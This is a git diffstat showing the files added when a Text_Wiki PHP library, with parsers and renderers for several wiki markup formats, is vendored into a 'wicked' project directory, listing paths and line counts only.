 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Image.php   |  114 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Include.php |  102 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Interwiki.php   |  140 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Italic.php  |   87 ++
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/List.php |  250 ++++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Newline.php |   77 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Page.php |   69 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Paragraph.php   |  148 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Plugin.php  |  134 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Prefilter.php   |   80 +
 .../Text/Wiki/Parse/Tiki/Preformatted.php          |   74 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Raw.php  |   74 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Revise.php  |  147 ++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Smiley.php  |   67 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Specialchar.php |   73 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Strong.php  |   92 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Subscript.php   |   82 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Superscript.php |   82 +
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Table.php   |  235 +++
 .../lib/Text_Wiki/Text/Wiki/Parse/Tiki/Tighten.php |   51 +
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Titlebar.php    |   45 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Toc.php  |   82 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Tt.php   |   86 ++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Underline.php   |   81 +
 wicked/lib/Text_Wiki/Text/Wiki/Parse/Tiki/Url.php  |  293 ++++
 .../Text_Wiki/Text/Wiki/Parse/Tiki/Wikilink.php    |  224 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render.php          |  234 +++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Cowiki.php   |   16 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Anchor.php   |   23 +
 .../Text/Wiki/Render/Cowiki/Blockquote.php         |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Bold.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Box.php  |   33 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Break.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Center.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Code.php |   23 +
 .../Text/Wiki/Render/Cowiki/Colortext.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Deflist.php  |   23 +
 .../Text/Wiki/Render/Cowiki/Delimiter.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Embed.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Emphasis.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Freelink.php |    9 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Function.php |   25 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Heading.php  |   13 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Horiz.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Html.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Image.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Include.php  |    8 +
 .../Text/Wiki/Render/Cowiki/Interwiki.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Italic.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/List.php |   56 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Newline.php  |   13 +
 .../Text/Wiki/Render/Cowiki/Paragraph.php          |   23 +
 .../Text/Wiki/Render/Cowiki/Phplookup.php          |   25 +
 .../Text/Wiki/Render/Cowiki/Prefilter.php          |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Raw.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Revise.php   |   36 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Strong.php   |   23 +
 .../Text/Wiki/Render/Cowiki/Subscript.php          |   29 +
 .../Text/Wiki/Render/Cowiki/Superscript.php        |   29 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Table.php    |   55 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Tighten.php  |   10 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Toc.php  |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Tt.php   |   29 +
 .../Text/Wiki/Render/Cowiki/Underline.php          |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Cowiki/Url.php  |   45 +
 .../Text_Wiki/Text/Wiki/Render/Cowiki/Wikilink.php |   29 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Creole.php   |   16 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Address.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Anchor.php   |   23 +
 .../Text/Wiki/Render/Creole/Blockquote.php         |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Bold.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Box.php  |   30 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Break.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Center.php   |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Code.php |   23 +
 .../Text/Wiki/Render/Creole/Colortext.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Deflist.php  |   23 +
 .../Text/Wiki/Render/Creole/Delimiter.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Embed.php    |   29 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Emphasis.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Freelink.php |    9 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Function.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Heading.php  |   16 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Horiz.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Html.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Image.php    |   26 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Include.php  |   16 +
 .../Text/Wiki/Render/Creole/Interwiki.php          |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Italic.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/List.php |   53 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Newline.php  |   12 +
 .../Text/Wiki/Render/Creole/Paragraph.php          |   29 +
 .../Text/Wiki/Render/Creole/Phplookup.php          |   25 +
 .../Text/Wiki/Render/Creole/Prefilter.php          |   10 +
 .../Text/Wiki/Render/Creole/Preformatted.php       |   27 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Raw.php  |   33 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Revise.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Strong.php   |   23 +
 .../Text/Wiki/Render/Creole/Subscript.php          |   23 +
 .../Text/Wiki/Render/Creole/Superscript.php        |   23 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Table.php    |   70 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Tighten.php  |   10 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Toc.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Tt.php   |   29 +
 .../Text/Wiki/Render/Creole/Underline.php          |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Creole/Url.php  |   40 +
 .../Text_Wiki/Text/Wiki/Render/Creole/Wikilink.php |   43 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Docbook.php  |   45 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Anchor.php  |   40 +
 .../Text/Wiki/Render/Docbook/Blockquote.php        |   53 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Bold.php    |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Box.php |   54 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Break.php   |   47 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Center.php  |   51 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Code.php    |   52 +
 .../Text/Wiki/Render/Docbook/Colortext.php         |   80 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Deflist.php |   75 +
 .../Text/Wiki/Render/Docbook/Delimiter.php         |   46 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Embed.php   |   47 +
 .../Text/Wiki/Render/Docbook/Emphasis.php          |   55 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Font.php    |   59 +
 .../Text/Wiki/Render/Docbook/Freelink.php          |   35 +
 .../Text/Wiki/Render/Docbook/Function.php          |   73 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Heading.php |  201 +++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Horiz.php   |   46 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Html.php    |   48 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Image.php   |  180 +++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Include.php |   32 +
 .../Text/Wiki/Render/Docbook/Interwiki.php         |   80 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Italic.php  |   54 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/List.php    |   95 ++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Newline.php |   34 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Page.php    |   46 +
 .../Text/Wiki/Render/Docbook/Paragraph.php         |   49 +
 .../Text/Wiki/Render/Docbook/Phplookup.php         |   59 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Plugin.php  |   47 +
 .../Text/Wiki/Render/Docbook/Prefilter.php         |   34 +
 .../Text/Wiki/Render/Docbook/Preformatted.php      |   46 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Raw.php |   45 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Revise.php  |   61 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Smiley.php  |   74 +
 .../Text/Wiki/Render/Docbook/Specialchar.php       |   52 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Strong.php  |   54 +
 .../Text/Wiki/Render/Docbook/Subscript.php         |   49 +
 .../Text/Wiki/Render/Docbook/Superscript.php       |   49 +
 .../Text_Wiki/Text/Wiki/Render/Docbook/Table.php   |  140 ++
 .../Text_Wiki/Text/Wiki/Render/Docbook/Tighten.php |   34 +
 .../Text/Wiki/Render/Docbook/Titlebar.php          |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Toc.php |  115 ++
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Tt.php  |   49 +
 .../Text/Wiki/Render/Docbook/Underline.php         |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Docbook/Url.php |  125 ++
 .../Text/Wiki/Render/Docbook/Wikilink.php          |  160 ++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku.php     |   16 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Anchor.php |   33 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Blockquote.php |   37 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Bold.php   |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Box.php |   34 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Break.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Center.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Code.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Colortext.php  |   52 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Deflist.php    |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Delimiter.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Embed.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Emphasis.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Freelink.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Function.php   |   70 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Heading.php    |   11 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Horiz.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Html.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Image.php  |   39 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Include.php    |    8 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Interwiki.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Italic.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/List.php   |   56 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Newline.php    |   13 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Paragraph.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Phplookup.php  |   25 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Prefilter.php  |   25 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Raw.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Revise.php |   36 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Strong.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Subscript.php  |   29 +
 .../Text/Wiki/Render/Doku/Superscript.php          |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Doku/Table.php  |   96 ++
 .../Text_Wiki/Text/Wiki/Render/Doku/Tighten.php    |   10 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Toc.php |   26 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Tt.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Underline.php  |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Doku/Url.php |   52 +
 .../Text_Wiki/Text/Wiki/Render/Doku/Wikilink.php   |   33 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex.php    |   90 ++
 .../Text_Wiki/Text/Wiki/Render/Latex/Anchor.php    |   33 +
 .../Text/Wiki/Render/Latex/Blockquote.php          |   36 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Bold.php  |   28 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Box.php   |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Break.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Center.php    |   33 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Code.php  |   26 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Colortext.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Deflist.php   |   53 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Delimiter.php |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Embed.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Emphasis.php  |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Font.php  |   73 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Freelink.php  |    8 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Function.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Heading.php   |   33 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Horiz.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Html.php  |   25 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Image.php |   70 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Include.php   |    8 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Interwiki.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Italic.php    |   28 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/List.php  |   76 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Newline.php   |   12 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Page.php  |   48 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Paragraph.php |   31 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Phplookup.php |   34 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Plugin.php    |   49 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Prefilter.php |   24 +
 .../Text/Wiki/Render/Latex/Preformatted.php        |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Raw.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Revise.php    |   38 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Smiley.php    |   44 +
 .../Text/Wiki/Render/Latex/Specialchar.php         |   54 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Strong.php    |   30 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Subscript.php |   54 +
 .../Text/Wiki/Render/Latex/Superscript.php         |   31 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Table.php |   99 ++
 .../Text_Wiki/Text/Wiki/Render/Latex/Tighten.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Titlebar.php  |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Toc.php   |   30 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Latex/Tt.php |   30 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Underline.php |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Latex/Url.php   |   41 +
 .../Text_Wiki/Text/Wiki/Render/Latex/Wikilink.php  |   63 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain.php    |   16 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Anchor.php    |   23 +
 .../Text/Wiki/Render/Plain/Blockquote.php          |   39 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Bold.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Box.php   |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Break.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Center.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Code.php  |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Colortext.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Deflist.php   |   59 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Delimiter.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Embed.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Emphasis.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Font.php  |   44 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Freelink.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Function.php  |   39 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Heading.php   |   14 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Horiz.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Html.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Image.php |   22 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Include.php   |    8 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Interwiki.php |   29 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Italic.php    |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/List.php  |   68 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Newline.php   |   12 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Page.php  |   48 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Paragraph.php |   31 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Phplookup.php |   25 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Plugin.php    |   49 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Prefilter.php |   24 +
 .../Text/Wiki/Render/Plain/Preformatted.php        |   48 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Raw.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Revise.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Smiley.php    |   44 +
 .../Text/Wiki/Render/Plain/Specialchar.php         |   54 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Strong.php    |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Subscript.php |   48 +
 .../Text/Wiki/Render/Plain/Superscript.php         |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Table.php |   65 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Tighten.php   |   10 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Titlebar.php  |   54 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Toc.php   |   39 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Plain/Tt.php |   24 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Underline.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Plain/Url.php   |   29 +
 .../Text_Wiki/Text/Wiki/Render/Plain/Wikilink.php  |   24 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki.php     |   16 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Anchor.php |   29 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Blockquote.php |   35 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Bold.php   |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Box.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Break.php  |   24 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Center.php |   29 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Code.php   |   27 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Colortext.php  |   52 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Deflist.php    |   68 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Delimiter.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Embed.php  |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Emphasis.php   |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Freelink.php   |    9 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Function.php   |   70 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Heading.php    |   13 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Horiz.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Html.php   |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Image.php  |   42 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Include.php    |    8 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Interwiki.php  |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Italic.php |   23 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/List.php   |   51 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Newline.php    |   12 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Paragraph.php  |   27 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Phplookup.php  |   25 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Prefilter.php  |   25 +
 .../Text/Wiki/Render/Tiki/Preformatted.php         |   48 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Raw.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Redirect.php   |   42 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Revise.php |   37 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Strong.php |   23 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Subscript.php  |   30 +
 .../Text/Wiki/Render/Tiki/Superscript.php          |   30 +
 .../lib/Text_Wiki/Text/Wiki/Render/Tiki/Table.php  |   71 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Tighten.php    |   10 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Toc.php |   25 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Tt.php  |   29 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Underline.php  |   23 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Tiki/Url.php |   40 +
 .../Text_Wiki/Text/Wiki/Render/Tiki/Wikilink.php   |   36 +
 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml.php    |  107 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Address.php   |   54 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Anchor.php    |   48 +
 .../Text/Wiki/Render/Xhtml/Blockquote.php          |   72 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Bold.php  |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Box.php   |   62 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Break.php |   52 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Center.php    |   62 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Code.php  |  133 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Colortext.php |   79 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Deflist.php   |   87 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Delimiter.php |   46 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Embed.php |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Emphasis.php  |   58 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Font.php  |   83 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Freelink.php  |   35 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Function.php  |  108 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Heading.php   |   88 ++
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Horiz.php |   51 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Html.php  |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Image.php |  184 +++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Include.php   |   32 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Interwiki.php |  103 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Italic.php    |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/List.php  |  172 +++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Newline.php   |   35 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Page.php  |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Paragraph.php |   59 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Phplookup.php |   81 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Plugin.php    |   47 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Prefilter.php |   34 +
 .../Text/Wiki/Render/Xhtml/Preformatted.php        |   47 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Raw.php   |   46 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Revise.php    |   68 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Smiley.php    |   74 +
 .../Text/Wiki/Render/Xhtml/Specialchar.php         |   52 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Strong.php    |   58 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Subscript.php |   57 +
 .../Text/Wiki/Render/Xhtml/Superscript.php         |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Table.php |  140 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Tighten.php   |   34 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Titlebar.php  |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Toc.php   |  116 ++
 wicked/lib/Text_Wiki/Text/Wiki/Render/Xhtml/Tt.php |   58 +
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Underline.php |   57 +
 .../lib/Text_Wiki/Text/Wiki/Render/Xhtml/Url.php   |  131 ++
 .../Text_Wiki/Text/Wiki/Render/Xhtml/Wikilink.php  |  177 +++
 wicked/lib/Text_Wiki/Text/Wiki/Tiki.php            |   92 ++
 wicked/lib/Text_Wiki/composer.json                 |   41 +
 wicked/lib/Text_Wiki/doc/BBCodeParser.php          |  427 ++++++
 wicked/lib/Text_Wiki/doc/BBCodeParser_V2.ini       |  160 ++
 wicked/lib/Text_Wiki/doc/BBtest.txt                |  103 ++
 wicked/lib/Text_Wiki/doc/README_BBCodeParser       |   45 +
 wicked/lib/Text_Wiki/doc/parser.php                |  121 ++
 wicked/lib/Text_Wiki/doc/test_Text_Wiki.php        |  184 +++
 wicked/lib/Text_Wiki/package.xml                   |  526 +++++++
 wicked/lib/Text_Wiki/packageBBCode.xml             |  146 ++
 wicked/lib/Text_Wiki/packageCowiki.xml             |  144 ++
 wicked/lib/Text_Wiki/packageCreole.xml             |  132 ++
 wicked/lib/Text_Wiki/packageDoku.xml               |  140 ++
 wicked/lib/Text_Wiki/packageMediawiki.xml          |  160 ++
